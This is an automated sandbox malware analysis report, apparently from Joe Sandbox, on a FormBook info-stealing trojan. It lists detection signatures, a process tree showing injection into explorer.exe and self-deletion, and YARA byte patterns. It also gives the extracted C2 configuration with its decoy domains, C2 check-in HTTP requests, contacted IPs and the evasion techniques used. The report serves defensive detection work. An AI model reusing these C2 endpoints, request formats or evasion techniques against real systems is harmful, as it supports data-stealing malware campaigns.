Loading ...

Play interactive tourEdit tour

Windows Analysis Report iAuPyHuUkk

Overview

General Information

Sample Name:iAuPyHuUkk (renamed file extension from none to exe)
Analysis ID:501991
MD5:6040407905ea1aa24dd58dc8befa4255
SHA1:96ecf27fd10a6663cbfaadb7643abeaf4061ea77
SHA256:2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • iAuPyHuUkk.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: 6040407905EA1AA24DD58DC8BEFA4255)
    • iAuPyHuUkk.exe (PID: 6968 cmdline: C:\Users\user\Desktop\iAuPyHuUkk.exe MD5: 6040407905EA1AA24DD58DC8BEFA4255)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5980 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • control.exe (PID: 3540 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 4432 cmdline: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aliexpress-br.com/mexq/"], "decoy": ["cyebang.com", "hcswwsz.com", "50003008.com", "yfly624.xyz", "trungtamhohap.xyz", "sotlbb.com", "bizhan69.com", "brandmty.net", "fucibou.xyz", "orderinformantmailer.store", "nobleminers.com", "divinevoid.com", "quickappraisal.net", "adventuretravelsworld.com", "ashainitiativemp.com", "ikkbs-a02.com", "rd26x.com", "goraeda.com", "abbastanza.info", "andypartridge.photography", "xn--aprendes-espaol-brb.com", "jrceleste.com", "bestwarsawhotels.com", "fospine.online", "rayofdesign.online", "hablamarca.com", "nichellejonesrealtor.com", "zamarasystem.com", "thepropertygoat.com", "fightfigures.com", "mxconglomerate.com", "elecoder.com", "mabnapakhsh.com", "girlspiter.club", "xn--lcka2cufqed6765c4ef1x1g.xyz", "cancleaningpros.com", "galestorm.net", "besrbee.com", "sjmdesignstudio.com", "kickonlines.com", "generateyourart.com", "promiseface.com", "searchingspacespot.com", "jovemmilionario.com", "paomovar.com", "dogiadunggiare.online", "uniqued.net", "glassrootsstudio.com", "rabenteec.com", "asistente-ti.com", "xn--l6qw76agwi5rjeuzk9q.com", "azapsolutions.com", "wmh3gk2fzw2m.biz", "districonio.com", "dapekdelivery.com", "vintagepaseo.com", "od0aew1pox.com", "iphone13promax.design", "texttheruffleddaisy.com", "umdasch-lagertechnik.com", "growthabove.com", "eltacorancherofoodtruck.com", "gafoodstamps.com", "mzalluom.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.iAuPyHuUkk.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.iAuPyHuUkk.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.iAuPyHuUkk.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
        • 0x16b18:$sqlite3text: 68 38 2A 90 C5
        • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
        0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          3.2.iAuPyHuUkk.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 6 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.aliexpress-br.com/mexq/"], "decoy": ["cyebang.com", "hcswwsz.com", "50003008.com", "yfly624.xyz", "trungtamhohap.xyz", "sotlbb.com", "bizhan69.com", "brandmty.net", "fucibou.xyz", "orderinformantmailer.store", "nobleminers.com", "divinevoid.com", "quickappraisal.net", "adventuretravelsworld.com", "ashainitiativemp.com", "ikkbs-a02.com", "rd26x.com", "goraeda.com", "abbastanza.info", "andypartridge.photography", "xn--aprendes-espaol-brb.com", "jrceleste.com", "bestwarsawhotels.com", "fospine.online", "rayofdesign.online", "hablamarca.com", "nichellejonesrealtor.com", "zamarasystem.com", "thepropertygoat.com", "fightfigures.com", "mxconglomerate.com", "elecoder.com", "mabnapakhsh.com", "girlspiter.club", "xn--lcka2cufqed6765c4ef1x1g.xyz", "cancleaningpros.com", "galestorm.net", "besrbee.com", "sjmdesignstudio.com", "kickonlines.com", "generateyourart.com", "promiseface.com", "searchingspacespot.com", "jovemmilionario.com", "paomovar.com", "dogiadunggiare.online", "uniqued.net", "glassrootsstudio.com", "rabenteec.com", "asistente-ti.com", "xn--l6qw76agwi5rjeuzk9q.com", "azapsolutions.com", "wmh3gk2fzw2m.biz", "districonio.com", "dapekdelivery.com", "vintagepaseo.com", "od0aew1pox.com", "iphone13promax.design", "texttheruffleddaisy.com", "umdasch-lagertechnik.com", "growthabove.com", "eltacorancherofoodtruck.com", "gafoodstamps.com", "mzalluom.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: iAuPyHuUkk.exeReversingLabs: Detection: 15%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5Avira URL Cloud: Label: malware
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: iAuPyHuUkk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: iAuPyHuUkk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
            Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D0440
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D042F
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D04CC
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D04AF
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D12AE
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D13C9
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D138F
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then jmp 064D12EEh0_2_064D13B7
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 4x nop then pop edi3_2_0041568A
            Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi13_2_009C568A

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49827 -> 154.216.110.149:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.vintagepaseo.com
            Source: C:\Windows\explorer.exeDomain query: www.brandmty.net
            Source: C:\Windows\explorer.exeDomain query: www.iphone13promax.design
            Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.umdasch-lagertechnik.com
            Source: C:\Windows\explorer.exeDomain query: www.districonio.com
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.226 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.216.110.149 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.cyebang.com
            Source: C:\Windows\explorer.exeDomain query: www.xn--aprendes-espaol-brb.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.aliexpress-br.com/mexq/
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.vintagepaseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.xn--aprendes-espaol-brb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1Host: www.cyebang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.Vintagepaseo.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: iAuPyHuUkk.exe, 00000000.00000003.357814039.000000000639D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html9
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com8
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.N
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.Z
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: iAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: iAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmll
            Source: iAuPyHuUkk.exe, 00000000.00000003.360377419.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
            Source: iAuPyHuUkk.exe, 00000000.00000003.351807780.000000000637B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: iAuPyHuUkk.exe, 00000000.00000003.354702125.000000000636B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn7
            Source: iAuPyHuUkk.exe, 00000000.00000003.362371401.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.362345727.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: iAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//e
            Source: iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ico
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.357744601.0000000006395000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: iAuPyHuUkk.exe, 00000000.00000003.351987416.000000000637B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeV
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zf
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJI
